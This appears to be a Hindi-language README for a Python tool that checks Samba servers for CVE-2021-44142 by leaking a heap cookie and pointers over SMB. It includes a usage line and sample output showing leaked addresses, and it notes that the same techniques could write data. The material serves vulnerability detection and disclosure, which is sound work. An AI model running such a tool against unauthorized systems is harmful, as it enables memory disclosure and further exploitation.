
पायथन टूल जो सिंगल SMB कनेक्शन के माध्यम से हीप कुकीज़ और पॉइंटर्स लीक करके Samba सर्वरों में CVE-2021-44142 की जाँच करता है, जिससे शोषण की संभावना प्रदर्शित होती है।
यह जाँचने के लिए एक उपकरण है कि कोई Samba सर्वर CVE-2021-44142 के प्रति संवेदनशील है या नहीं
CVE-2021-44142 Samba के vfs_fruit मॉड्यूल में एक हीप आउट-ऑफ-बाउंड रीड और राइट है, जिसका उपयोग Pwn2Own Austin 2021 में Western Digital PR4100 के विरुद्ध किया गया था। इसे सबसे पहले STAR Labs के Nguyễn Hoàng Thạch और Billy Jheng Bing-Jhong द्वारा खोजा गया था। DEVCORE के Orange Tsai ने भी इस भेद्यता की सूचना दी थी। यह कार्य 0xsha के https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142 पर एक ब्लॉग पोस्ट पर आधारित है।
यह उपकरण एक talloc हीप कुकी और लिंक्ड सूची पॉइंटर को डंप करके CVE-2021-44142 के प्रति भेद्यता प्रदर्शित करता है। इस डेटा को लिखने के लिए समान तकनीकों का उपयोग किया जा सकता है।
यह कार्य 0xsha के कार्य का विस्तार निम्नलिखित तरीकों से करता है:
python check_vulnerable.py
usage: check_vulnerable.py [-h] [--password PASSWORD] server port share user
check_vulnerable.py: error: the following arguments are required: server, port, share, user
python check_vulnerable.py 192.168.1.183 445 TimeMachineBackup Guest
{
"vulnerable": true,
"heap_cookie_leak": "0xfc571370",
"heap_pointer_leak": "0x55e4e717b1b0",
"fail_reason": ""
}